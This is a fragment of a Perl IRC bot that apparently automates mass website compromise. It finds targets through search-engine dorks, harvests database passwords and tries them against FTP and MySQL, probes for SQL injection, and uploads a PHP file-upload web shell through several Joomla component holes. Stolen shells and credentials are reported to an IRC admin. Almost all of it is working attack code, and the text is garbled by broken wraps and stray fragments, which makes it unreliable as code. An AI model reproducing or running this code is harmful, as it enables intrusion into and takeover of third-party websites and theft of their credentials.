] 12$info"); my $lulz = "http://".$site; my $user = ""; my $pass = ""; my $user2 = ""; my $pass2 = ""; my $dtbs2 = ""; if($lulz =~ /([^:]*:\/\/)?([^\/]+\.[^\/]+)/g) { my $host = $2; my @ftpu = split(":Viva-Byroe.Net:", $userpass); my @dbic = split(":Viva-Byroe.Net:", $info); $user = $ftpu[0]; $pass = $ftpu[1]; $user2 = $dbic[0]; $pass2 = $dbic[1]; $dtbs2 = $ dbic[2]; my $ftpstat = ""; if($user =~ /_/) { @userz = split("_", $ user); $user = $userz[0];} &ftp_connect($test1,$host,$user, $pass,$chan,$engine,$whmcslogo);sleep(1); &dbi_connect($host,$user2,$pass2 ,$dtbs2,$chan,$engine,$whmcslogo);sleep(1); } my $ceksubmit = &get_content($submit); if ($ceksubmit =~ /Urgency/i) { &msg("$submitchan","$whmcslogo6$e ngine12 Submit Ticket 15[6 ".$submit." 15]"); sleep(2); my $uploader = "http://".$site."/downloa ds/indexx.php"; my $uploader2 = "http://".$site."/templa tes_c/indexx.php"; my $cekup = &get_content($uploader); my $cekup2 = &get_content($uploader2); if ($cekup =~ /enctype=\"multipart\/form -data"/i) { &msg("$chanxxx","$whmcslogo6$engine12 Uploader 15[6 ".$uploader." 15]");& msg("$admin","$whmcslogo6$engine12 Uploader 15[12 ".$uploader." 15]"); } if ($cekup2 =~ /enctype=\"multipart\/for m-data"/i) { &msg("$chanxxx","$whmcslogo6$engine12 Uploader 15[6 ".$uploader2." 15]") ;&msg("$chanxxx","$whmcslogo6$engine12 Uploader 15[12 ".$uploader2." 15]"); } }
} } exit; } } } } sub ftp_connect { my $url = $_[0]; my $host = $_[1]; my $user = $_[2]; my $pass = $_[3]; my $chan = $_[4]; my $engine = $_[5]; my $logo = $_[6]; my $success = 1; use Net::FTP; my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 7); $success = 0 if $ftp->login($user,$pass); $ftp->quit; if ($success == 0) { &msg("$admin","$logo6$engine12 FTP 15[ 12http://".$host." 15] er.":".$pass." 15]"); } } sub dbi_connect () { my $host = $_[0]; my $user = $_[1]; my $pass = $_[2]; my $dtbs = $_[3]; my $chan = $_[4]; my $engine = $_[5]; my $logo = $_[6]; my $port = "3306"; my $platform = "mysql"; my $dsn = "dbi:$platform:$dtbs:$host:$port"; my $DBIconnect= DBI->connect($dsn,$user,$pass); if ($DBIconnect) { &msg("$chanxxx","$logo6$engine12 MySql 15[ 12http://".$host." onnected 15]"); } } sub getUserPass() { my $string = $_[0]; my @lol = split("\r\n", $string); my $pass = ""; my $user = ""; foreach my $line (@lol) { if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ db_password(.*?)=(.*?)"(.+?)";/i)) { $pass = $3; } if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ db_username(.*?)=(.*?)"(.+?)";/i)) { $user = $3; } } return $user.":Viva-Byroe.Net:".$pass; }
[4 ".$us
15] [4 C
m/
m/
sub getinfo() { my $string = $_[0]; my @lol = split("\r\n", $string); my $pass = ""; my $user = ""; my $dbs = ""; foreach my $line (@lol) { if(($line =~ m/db_password(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/ db_password(.*?)=(.*?)"(.+?)";/i)) { $pass = $3; } if(($line =~ m/db_username(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/ db_username(.*?)=(.*?)"(.+?)";/i)) { $user = $3; } if(($line =~ m/db_name(.*?)=(.*?)'(.+?)';/i) or ($line =~ m/db_n ame(.*?)=(.*?)"(.+?)";/i)) { $dbs = $3; } } return $user.":Viva-Byroe.Net:".$pass.":Viva-Byroe.Net:".$dbs; } sub zero_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$zerologo); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$zerologo6$engine 12 Finished"); } my $coba = "http://".$site.$bug; my $cek = &get_content($coba);sleep(1); if ($pid = fork){ waitpid($pid ,0); } else { if (fork) { exit; } else { if ($cek =~ /Zeroboard/) { system("./zbc $coba 8 0");sleep(1); my $vulner1 = "http://".$site.$action."? cmd="; my $vulner2 = "http://".$site.$action.$w getdon; my $vulner3 = "http://".$site.$action.$l wpdon; my $vulner4 = "http://".$site.$action.$c urldon; my $vuln1 = "http://".$site."/data/vito. php"; my $check2 = &get_content($vulner1); if ($check2 =~ /vito-RawckerheaD/i) { if ($zerowget == 1) { my $coba1 = &get_content($vulner2);sleep(2); } if ($zerolwp == 1 ) { my $coba2 = &get_content($vulner3);sleep(2); } if ($zerocurl == 1) { my $coba3
= &get_content($vulner4);sleep(2); } my $check1 = &get_content($vuln1 ); if ($check1 =~ /vito-RawckerheaD /i) { my $safe = ""; my $os = ""; my $uid = ""; if ($check1 =~ m/SAFE_MO DE: <b><font color=blue>(.*?)<\/font>/) {$safe = $1;} if ($check1 =~ m/color=r ed><b> (.*?)<br>/) {$os = $1;} if ($check1 =~ m/uid=(.* ?)gid=/) {$uid = $1;} &msg("$admin","$ zerologo6$engine12 sHeLL6 ".$vuln1."15 (SafeMode=$safe) (OS=$os) uid=$uid "); &msg("$chan","$z erologo6$engine12 sHeLL6 ".$vuln1."15 (SafeMode=$safe) (OS=$os) uid=$uid "); } else { &msg("$chan","$zerologo6$ engine12 Cek dewe 15 $vulner1 "); } sleep(2); } } } exit; } } } } sub sql_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $simpan = $_[2]; my $dork = $_[3]; my $engine = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$sqllogo); my $num = scalar(@totexploit); if ($num > 0) { foreach my $site (@totexploit) { $count++; if ($count == $num-1) { &msg("$chan","$sqllogo 4$engine 0 Selesai"); } my $test = "http://".$site.$bug."'"; my $vuln = "http://".$site."4".$bug; my $sqlsite = "http://".$site.$bug; my $html = &get_content($test); if (my $pid = fork) { waitpid($pid, 0); } else { if (for k) { exit; } else { if ($html =~ m/You have an error in your SQL syntax/i || $html =~ m/ Query failed/i || $html =~ m/SQL query failed/i || $html =~ m/Warning: mysql_ af fected_ rows()/i || $html =~ m/Warning: mysql_ client_ encoding()/i || $html =~ m/Warning: mysql_ close()/i || $html =~ m/Warning: mysql_ connect()/i || $html = ~ m/Warning: mysql_ create_ db()/i || $html =~ m/Warning: mysql_ data_ seek()/i || $html =~ m/Warning: mysql_ drop_ db()/i || $html =~ m/Warning: mysql_ escape_ string()/i || $html =~ m/Warning: mysql_ fetch_ array()/i || $html =~ m/Warning : mysql_ fetch_ assoc()/i || $html =~ m/Warning: mysql_ fetch_ field()/i || $htm l =~ m/Warning: mysql_ fetch_ object()/i || $html =~ m/Warning: mysql_ fetch_ le ngths()/i || $html =~ m/Warning: mysql_ fetch_ row()/i || $html =~ m/Warning: my sql_ field_ name()/i || $html =~ m/Warning: mysql_ field_ seek()/i || $html =~ m /Warning: mysql_ field_ table()/i || $html =~ m/Warning: mysql_ field_ flags()/i || $html =~ m/Warning: mysql_ field_ type()/i || $html =~ m/ Warning: mysql_ get_ client_ info()/i || $html =~ m/Warning: mysql_ get_ host_ i
nfo()/i || $html =~ m/Warning: mysql_ get_ proto_ info()/i || $html =~ m/Warning : mysql_ get_ server_ info()/i || $html =~ m/Warning: mysql_ info()/i || $html = ~ m/Warning: mysql_ list_ dbs()/i || $html =~ m/Warning: mysql_ list_ processes( )/i || $html =~ m/Warning: mysql_ list_ tables()/i || $html =~ m/Warning: mysql_ num_ fields()/i || $html =~ m/Warning: mysql_ num_ rows()/i || $html =~ m/Warni ng: mysql_ query()/i || $html =~ m/Warning: mysql_ select_ db()/i || $html =~ m/ Warning: mysql_ tablename()/i || $html =~ m/Warning: mysql_ unbuffered_ query()/ i ) { &msg("$chan","$sqllogo6$engine3 (4MySQL3)4 ".$vuln);} elsif ($html =~ m/ODBC SQL Server Driver/i || $html =~ m/Unclosed qu otation mark/i || $html =~ m/Microsoft OLE DB Provider for/i || $html =~ m/unclo sed quotation|mysql_fetch_array(): supplied argument is not a valid MySQL result resource in/i || $html =~ m/The error occurred while processing an element with a general identifier of (CFPARAM)/i ) { &msg("$chan","$sqllogo6$engine3 (13MsSQL3)13 ".$vuln);} elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Micros oft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i ) { &msg("$chan","$sqllogo6$engine3 (9MsSQL3)13 ".$vuln);} elsif ($html =~ m/Microsoft JET Database/i || $html =~ m/ODBC Micros oft Access Driver/i || $html =~ m/Microsoft OLE DB Provider for Oracle/i || $htm l =~ m/ODBC Error Code = S1000 (General error)/i || $html =~ m/[Oracle][ODBC][Or a]ORA-00911: invalid character/i || $html =~ m/ADODB.Field error '80020009'/i || $html =~ m/Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)/i ) { &msg("$chan","$sqllogo6$engine3 (2MsAccess3)2 ".$vuln);} } exit; sleep(2); } } } } sub civicrm_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$civicrmlogo,$nick) ; my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$civicrmlogo 4$engine 0 Sele sai"); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/
plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_civicrm/civicrm/packages/OpenFlashChart//tmp-upload-images/load.php" ); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$civicrmlogo$engine sHeLL http://".$site."/adminis trator/components/com_civicrm/civicrm/packages/OpenFlashChart//tmp-upload-images /load.php OS: ".$1); sleep(3); } } exit; } sleep(2); } } } } sub acy_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$acylogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$acylogo 4$engine 0 Selesai" ); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) {
if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_acymailing/inc/openflash//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$acylogo$engine sHeLL http://".$site."/administrat or/components/com_acymailing/inc/openflash//tmp-upload-images/load.php OS: ".$1) ; sleep(3); } } exit; } sleep(2); } } } } sub jnewsl_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jnewsllogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jnewsllogo 4$engine 0 Seles ai"); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_jnewsletter/includes/openflashchart//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) {
my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$jnewsllogo$engine sHeLL http://".$site."/administ rator/components/com_jnewsletter/includes/openflashchart//tmp-upload-images/load .php OS: ".$1); sleep(3); } } exit; } sleep(2); } } } } sub jinc_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jinclogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jinclogo 4$engine 0 Selesai "); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_jinc/classes/graphics//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$jinclogo$engine sHeLL http://".$site."/administra tor/components/com_jinc/classes/graphics//tmp-upload-images/load.php OS: ".$1);
sleep(3); } } exit; } sleep(2); } } } } sub mai_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$mailogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$mailogo 4$engine 0 Selesai" ); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_maianmedia/utilities/charts//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$mailogo$engine sHeLL http://".$site."/administrat or/components/com_maianmedia/utilities/charts//tmp-upload-images/load.php OS: ". $1); sleep(3); } } exit; } sleep(2);
} } } } sub jnews_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jnewslogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jnewslogo 4$engine 0 Selesa i"); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/administrator/com ponents/com_jnews/includes/openflashchart//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$jnewslogo$engine sHeLL http://".$site."/administr ator/components/com_jnews/includes/openflashchart//tmp-upload-images/load.php OS : ".$1); sleep(3); } } exit; } sleep(2); } } } }
sub jnew_exploit() { my $chan = $_[0]; my $bug = $_[1]; my $dork = $_[2]; my $engine = $_[3]; my $nick = $_[4]; my $count = 0; my @totexploit = &search_engine($chan,$bug,$dork,$engine,$jnewlogo,$nick); my $num = scalar(@totexploit); if ($num > 0){ foreach my $site(@totexploit){ $count++; if ($count == $num-1) { &msg("$chan","$jnewlogo 4$engine 0 Selesai "); } my $test = "http://".$site.$bug."?name=load.php"; $code = "Xr0b0t"; $code.= '<?php '; $code.= "echo '<b><br><br>OS:'.php_uname().'<br></b>'; "; $code.= 'echo \'Upload <form action="" method="post" enctype="multipart/for m-data" name="uploader" id="uploader">\'; '; $code.= 'echo \'<input type="file" name="file" size="50"><input name="_upl" type="submit" id="_upl" value="Upload"></form>\'; '; $code.= "if( \$_POST['_upl'] == \"Upload\" ) { "; $code.= "if(\@copy(\$_FILES['file']['tmp_name'], \$_FILES['file']['name'])) { echo '<b>Upload Succesfully !!!</b><br><br>'; } "; $code.= "else { echo '<b>Upload Fail !!!</b><br><br>'; } "; $code.= " } "; $code.= "?>"; my $ua = LWP::UserAgent->new; my $res = $ua->request(POST $test,Content_Type => 'text/ plain', Content => $code); my $print = $res->as_string(); if ($print =~ /Saving your image to: ..\/tmp-upload-images\/load.ph p/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { ex it; } else { my $hasil = get_content('http://'.$site."/components/com_jn ews/includes/openflashchart//tmp-upload-images/load.php"); if ($hasil =~ /Xr0b0t/) { my $safe =""; if ($hasil =~ /Xr0b0t<b><br><br>OS:(.*?) <br>/) {$safe = $1;} &msg("$admin","$jnewlogo$engine sHeLL http://".$site."/components /com_jnews/includes/openflashchart//tmp-upload-images/load.php OS: ".$1); sleep(3); } } exit; } sleep(2); } } } } ################################################################################ ## sub search_engine() { my (@total,@clean); my $chan = $_[0];
$bug = $_[1]; $dork = $_[2]; $engine = $_[3]; $logo = $_[4]; if ($gps == 1) { if ($engine eq "IndoAE") { my @Indoae = &Indo1($dork."+site:ae"); push(@tota l,@Indoae); } if ($engine eq "IndoAR") { my @Indoar = &Indo2($dork."+site:ar"); push(@tota l,@Indoar); } if ($engine eq "IndoAT") { my @Indoat = &Indo3($dork."+site:at"); push(@tota l,@Indoat); } if ($engine eq "IndoAU") { my @Indoau = &Indo4($dork."+site:au"); push(@tota l,@Indoau); } if ($engine eq "IndoBE") { my @Indobe = &Indo5($dork."+site:be"); push(@tota l,@Indobe); } if ($engine eq "IndoBG") { my @Indobg = &Indo6($dork."+site:bg"); push(@ total,@Indobg); } if ($engine eq "IndoBR") { my @Indobr = &Indo1($dork."+site:br"); push(@tota l,@Indobr); } if ($engine eq "IndoBY") { my @Indoby = &Indo2($dork."+site:by"); push(@ total,@Indoby); } if ($engine eq "IndoCA") { my @Indoca = &Indo3($dork."+site:ca"); push(@tota l,@Indoca); } if ($engine eq "IndoCL") { my @Indocl = &Indo4($dork."+site:cl"); push(@tota l,@Indocl); } if ($engine eq "IndoCK") { my @Indock = &Indo5($dork."+site:ck"); push(@tota l,@Indock); } if ($engine eq "IndoCN") { my @Indocn = &Indo6($dork."+site:cn"); push(@tota l,@Indocn); } if ($engine eq "IndoCO") { my @Indoco = &Indo1($dork."+site:co"); push(@tota l,@Indoco); } if ($engine eq "IndoCoM") { my @Indocom = &Indo2($dork."+site:com"); push(@t otal,@Indocom); } if ($engine eq "IndoCZ") { my @Indocz = &Indo3($dork."+site:cz"); push(@tota l,@Indocz); } if ($engine eq "IndoDE") { my @Indode = &Indo4($dork."+site:de"); push(@tota l,@Indode); } if ($engine eq "IndoEC") { my @Indoec = &Indo5($dork."+site:ec"); push(@tota l,@Indoec); } if ($engine eq "IndoEDU") { my @Indoedu = &Indo6($dork."+site:edu"); pus h(@total,@Indoedu); } if ($engine eq "IndoEE") { my @Indoee = &Indo1($dork."+site:ee"); push(@ total,@Indoee); } if ($engine eq "IndoES") { my @Indoes = &Indo2($dork."+site:es"); push(@tota l,@Indoes); } if ($engine eq "IndoEU") { my @Indoeu = &Indo3($dork."+site:eu"); push(@tota l,@Indoeu); } if ($engine eq "IndoFI") { my @Indofi = &Indo4($dork."+site:fi"); push(@ total,@Indofi); } if ($engine eq "IndoGR") { my @Indogr = &Indo5($dork."+site:gr"); push(@tota l,@Indogr); } if ($engine eq "IndoGOV") { my @Indogov = &Indo6($dork."+site:gov"); pus h(@total,@Indogov); } if ($engine eq "IndoFR") { my @Indofr = &Indo1($dork."+site:fr"); push(@ total,@Indofr); } if ($engine eq "IndoHU") { my @Indohu = &Indo2($dork."+site:hu"); push(@tota l,@Indohu); } if ($engine eq "IndoHK") { my @Indohk = &Indo3($dork."+site:hk"); push(@ total,@Indohk); } if ($engine eq "IndoHR") { my @Indohr = &Indo4($dork."+site:hr"); push(@
my my my my
total,@Indohr); } if ($engine eq "IndoID") { my @Indoid = &Indo5($dork."+site:id"); push(@tota l,@Indoid); } if ($engine eq "IndoIL") { my @Indoil = &Indo6($dork."+site:il"); push(@tota l,@Indoil); } if ($engine eq "IndoIN") { my @Indoin = &Indo1($dork."+site:in"); push(@tota l,@Indoin); } if ($engine eq "IndoInfO") { my @Indoinfo = &Indo2($dork."+site:info"); push (@total,@Indoinfo); } if ($engine eq "IndoIR") { my @Indoir = &Indo3($dork."+site:ir"); push(@tota l,@Indoir); } if ($engine eq "IndoIT") { my @Indoit = &Indo4($dork."+site:it"); push(@tota l,@Indoit); } if ($engine eq "IndoJP") { my @Indojp = &Indo5($dork."+site:jp"); push(@tota l,@Indojp); } if ($engine eq "IndoKR") { my @Indokr = &Indo6($dork."+site:kr"); push(@tota l,@Indokr); } if ($engine eq "IndoLV") { my @Indomx = &Indo1($dork."+site:lv"); push(@tota l,@Indolv); } if ($engine eq "IndoMD") { my @Indomd = &Indo2($dork."+site:md"); push(@ total,@Indomd); } if ($engine eq "IndoMX") { my @Indomx = &Indo3($dork."+site:mx"); push(@ total,@Indomx); } if ($engine eq "IndoMY") { my @Indomy = &Indo4($dork."+site:my"); push(@tota l,@Indomy); } if ($engine eq "IndoNeT") { my @Indonet = &Indo5($dork."+site:net"); push(@t otal,@Indonet); } if ($engine eq "IndoNO") { my @Indono = &Indo6($dork."+site:no"); push(@ total,@Indono); } if ($engine eq "IndoNL") { my @Indonl = &Indo1($dork."+site:nl"); push(@tota l,@Indonl); } if ($engine eq "IndoNZ") { my @Indonz = &Indo2($dork."+site:nz"); push(@ total,@Indonz); } if ($engine eq "IndoOrG") { my @Indoorg = &Indo3($dork."+site:org"); push(@t otal,@Indoorg); } if ($engine eq "IndoPH") { my @Indoph = &Indo4($dork."+site:ph"); push(@tota l,@Indoph); } if ($engine eq "IndoPK") { my @Indopk = &Indo5($dork."+site:pk"); push(@ total,@Indopk); } if ($engine eq "IndoPL") { my @Indopl = &Indo6($dork."+site:pl"); push(@tota l,@Indopl); } if ($engine eq "IndoPT") { my @Indopt = &Indo1($dork."+site:pt"); push(@ total,@Indopt); } if ($engine eq "IndoRO") { my @Indoro = &Indo2($dork."+site:ro"); push(@tota l,@Indoro); } if ($engine eq "IndoRU") { my @Indoru = &Indo3($dork."+site:ru"); push(@tota l,@Indoru); } if ($engine eq "IndoSE") { my @Indose = &Indo4($dork."+site:se"); push(@ total,@Indose); } if ($engine eq "IndoSG") { my @Indosg = &Indo5($dork."+site:sg"); push(@ total,@Indosg); } if ($engine eq "IndoTH") { my @Indoth = &Indo6($dork."+site:th"); push(@tota l,@Indoth); } if ($engine eq "IndoTK") { my @Indotk = &Indo1($dork."+site:tk"); push(@ total,@Indotk); } if ($engine eq "IndoTR") { my @Indotr = &Indo2($dork."+site:tr"); push(@ total,@Indotr); } if ($engine eq "IndoTV") { my @Indotv = &Indo3($dork."+site:tv"); push(@ total,@Indotv); } if ($engine eq "IndoTW") { my @Indotw = &Indo4($dork."+site:tw"); push(@
total,@Indotw); } if ($engine eq "IndoUK") { my @Indouk = &Indo5($dork."+site:uk"); push(@tota l,@Indouk); } if ($engine eq "IndoUS") { my @Indous = &Indo6($dork."+site:us"); push(@tota l,@Indous); } if ($engine eq "IndoVN") { my @Indovn = &Indo1($dork."+site:vn"); push(@tota l,@Indovn); } if ($engine eq "IndoWS") { my @Indows = &Indo2($dork."+site:ws"); push(@ total,@Indows); } if ($engine eq "IndoSI") { my @Indosi = &Indo3($dork."+site:si"); push(@tota l,@Indosi); } if ($engine eq "IndoZA") { my @Indoza = &Indo4($dork."+site:za"); push(@tota l,@Indoza); } if ($engine eq "IndoBIZ") { my @Indobiz = &Indo5($dork."+site:biz"); push(@t otal,@Indobiz); } } if ($engine eq "GooGLe") { my @google = &google($dork); push(@total,@google) ; } if ($gps2 == 1) { if ($engine eq "WaLLa") { my @walla = &walla($dork); push(@total,@walla); } if ($engine eq "YaHoo") { my @yahoo = &yahoo($dork); push(@total,@yahoo); } if ($engine eq "AsK") { my @ask = &ask($dork); push(@total,@ask); } if ($engine eq "Bing") { my @bing = &bing($dork); push(@total,@bing); } if ($engine eq "UoL") { my @uol = &uol($dork); push(@total,@uol); } if ($engine eq "OnEt") { my @onet = &onet($dork); push(@total,@onet); } if ($engine eq "CLusTy") { my @clusty = &clusty($dork); push(@total,@clusty) ; } if ($engine eq "SaPo") { my @sapo = &sapo($dork); push(@total,@sapo); } if ($engine eq "AoL") { my @aol = &aol($dork); push(@total,@aol); } if ($engine eq "LyCos") { my @lycos = &lycos($dork); push(@total,@lycos); } if ($engine eq "HotBot") { my @hotbot = &hotbot($dork); push(@total,@hotbot) ; } if ($engine eq "SeZNam") { my @seznam = &seznam($dork); push(@total,@seznam) ; } if ($engine eq "BigLobe") { my @biglobe = &biglobe($dork); push(@total,@bigl obe); } } @clean = &clean(@total); if ($silentmode == 0) { &msg("$chan","$logo15$engine 4<9=4>9 Total:4 [15".scalar(@total)."4] 9 Clean:4 [15".sca lar(@clean)."4] "); } return 